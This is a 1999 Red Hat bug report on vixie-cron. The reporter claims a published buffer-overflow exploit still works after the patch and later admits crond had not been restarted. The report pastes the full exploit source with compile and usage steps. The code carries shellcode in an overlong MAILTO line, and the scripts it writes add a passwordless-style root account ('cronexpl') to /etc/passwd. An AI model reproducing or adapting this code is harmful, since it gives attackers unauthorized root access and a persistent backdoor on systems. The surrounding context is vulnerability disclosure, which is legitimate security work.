Bug 5819

Summary: vixie cron exploit still works !
Product: [Retired] Red Hat Linux Reporter: shivan
Component: vixie-cronAssignee: Crutcher Dunnavant <crutcher>
Status: CLOSED NOTABUG QA Contact:
Severity: medium Docs Contact:
Priority: high    
Version: 6.0Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://www.life.be
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2001-04-10 22:05:26 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description shivan 1999-10-11 05:43:13 UTC 
'lo ..

i tried the vixie cron exploit which came out on 08/25/1999,
and it still works.

normally this exploit should have been fixed with
vixie-cron-3.0.1-37 , i installed upto 3.0.1-39 , and the
buffer overflow still works. I tried this on several
machines (all RH 6.0) with different kernels. (this also
works on alpha)

Please inform me ASAP about the progress on this bug
(original exploit pasted below).

Kind Regards,
Dimitri Avgoustakis
UNIX Administrator ..
LIFE - The Linux Company

exploit located on bugtraq :
"http://www.securityfocus.com/data/vulnerabilities/exploits/
crontab_exploit.c"

/*
        vixie-crontab-3.0.1 cron_popen() exploit by Akke -
30-8-99
                        Akke <c4c4>


        how to compile ?
                gcc crontab_exploit.c -o crontab_exploit

        how to use ?
                ./crontab_exploit
                crontab ./CrOn
                wait 1 minute
                crontab -r
                su -l cronexpl (password = exploited) (this
is root account)

        Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb
0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x4
0\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
        char crontab_file_string[max_buf_len];
        char temp[max_buf_len];
        FILE *fp;
        int i;

        strcpy(temp,
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
        sprintf(temp,"%s%s",temp,shellcode);
        sprintf(crontab_file_string,"MAILTO=%s\n",temp);
        strcat(crontab_file_string,"0");
        for (i=1;i<60;i++)
sprintf(crontab_file_string,"%s,%d",crontab_file_string,i);
        sprintf(temp," * * * * %s\n",CronEchoScript);
        strcat(crontab_file_string,temp);

        if ((fp = fopen(CronFile,"w+")) != NULL) {
                fprintf(fp,"%s",crontab_file_string);
                fclose(fp);
        }

        if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\necho Wrong window!");
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,CronEchoScript);
                system(temp);
        }

        if ((fp = fopen(RootScript,"w+")) != NULL) {
                #define login "cronexpl"
                #define passw "1T8uqGnJZ0OsQ" /* "exploited"
*/
                fprintf(fp,"#!/bin/sh\necho
%s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s
%s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,RootScript);
                system(temp);
        }

        if ((fp = fopen("/tmp/ce","w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,"/tmp/ce");
                system(temp);
        }
        exit(0);
}
Comment 1 shivan 1999-10-11 06:24:59 UTC 
RHSA-1999:030-01: vixie-cron crond MAILTO
Comment 2 shivan 1999-10-11 07:10:59 UTC 
dear redhat,

i'm pleased to tell you i'm stupid ..
i forgot to stop/start cond after upgrading ..

my apollogies ;)